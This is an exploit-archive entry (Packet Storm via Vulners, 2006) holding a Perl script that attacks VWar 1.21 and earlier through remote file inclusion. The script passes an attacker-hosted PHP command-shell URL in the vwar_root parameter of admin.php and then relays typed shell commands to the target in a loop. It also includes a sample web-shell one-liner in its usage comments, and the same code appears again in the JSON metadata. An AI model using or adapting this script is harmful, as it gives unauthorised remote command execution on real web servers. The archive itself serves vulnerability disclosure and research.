Search...

VWar-1.2.1.txt

2006-04-26T00:00:00

ID PACKETSTORM:45721
Type packetstorm
Reporter s3rv3r_hack3r
Modified 2006-04-26T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# Exploit by s3rv3r_hack3r  
# Special Thanx : hessamx ,sattar.li , stanic, mfox,blood moon and..  
######################################################  
# ___ ___ __ #  
# / | \_____ ____ | | __ ___________________ #  
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #  
#\ Y // __ \\ \___| &lt;\ ___/| | \// / #  
# \___|_ /(____ )\___ &gt;__|_ \\___ &gt;__| /_____ \ #  
# \/ \/ \/ \/ \/ \/ #  
# Iran Hackerz Security Team #  
# WebSite: www.hackerz.ir #  
######################################################  
# VWar &lt;= ver 1.21 Remote Code Execution Exploit #  
# usage: &gt;&gt;&gt;&gt; #  
# perl vwar.pl +location of VWar+ +shell Url+ #  
# location example :http://raeget/modules/vwar/admin #  
# cmd shell example: &lt;?shell_exec($_GET[cmd]);?&gt; #  
######################################################  
use LWP::Simple;  
  
print "-------------------------------------------\n";  
print "= vwar Exploit BY s3rv3r_hack3r =\n";  
print "= IHST (WwW.hackerz.ir) =\n";  
print"-------------------------------------------\n\n";  
  
$targ = $ARGV[0];  
$cmdurl = $ARGV[1];  
  
$con=get("http://".$targ) || die "[-]Cannot connect to Host";  
while ()  
{  
  
print "Cmd@IHST |\$";  
chomp($cmd=&lt;STDIN&gt;);  
  
  
$commd=get("http://".$targ."/admin.php?vwar_root=".$cmdurl."&cmd=".$cmd)  
}  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:45721", "type": "packetstorm", "bulletinFamily": "exploit", "title": "VWar-1.2.1.txt", "description": "", "published": "2006-04-26T00:00:00", "modified": "2006-04-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/45721/VWar-1.2.1.txt.html", "reporter": "s3rv3r_hack3r", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:05", "viewCount": 6, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:29:05", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:05", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/45721/VWar-1.2.1.txt", "sourceData": "`#!/usr/bin/perl \n# \n# Exploit by s3rv3r_hack3r \n# Special Thanx : hessamx ,sattar.li , stanic, mfox,blood moon and.. \n###################################################### \n# ___ ___ __ # \n# / | \\_____ ____ | | __ ___________________ # \n#/ ~ \\__ \\ _/ ___\\| |/ // __ \\_ __ \\___ / # \n#\\ Y // __ \\\\ \\___| <\\ ___/| | \\// / # \n# \\___|_ /(____ )\\___ >__|_ \\\\___ >__| /_____ \\ # \n# \\/ \\/ \\/ \\/ \\/ \\/ # \n# Iran Hackerz Security Team # \n# WebSite: www.hackerz.ir # \n###################################################### \n# VWar <= ver 1.21 Remote Code Execution Exploit # \n# usage: >>>> # \n# perl vwar.pl +location of VWar+ +shell Url+ # \n# location example :http://raeget/modules/vwar/admin # \n# cmd shell example: <?shell_exec($_GET[cmd]);?> # \n###################################################### \nuse LWP::Simple; \n \nprint \"-------------------------------------------\\n\"; \nprint \"= vwar Exploit BY s3rv3r_hack3r =\\n\"; \nprint \"= IHST (WwW.hackerz.ir) =\\n\"; \nprint\"-------------------------------------------\\n\\n\"; \n \n$targ = $ARGV[0]; \n$cmdurl = $ARGV[1]; \n \n$con=get(\"http://\".$targ) || die \"[-]Cannot connect to Host\"; \nwhile () \n{ \n \nprint \"Cmd@IHST |\\$\"; \nchomp($cmd=<STDIN>); \n \n \n$commd=get(\"http://\".$targ.\"/admin.php?vwar_root=\".$cmdurl.\"&cmd=\".$cmd) \n} \n`\n"}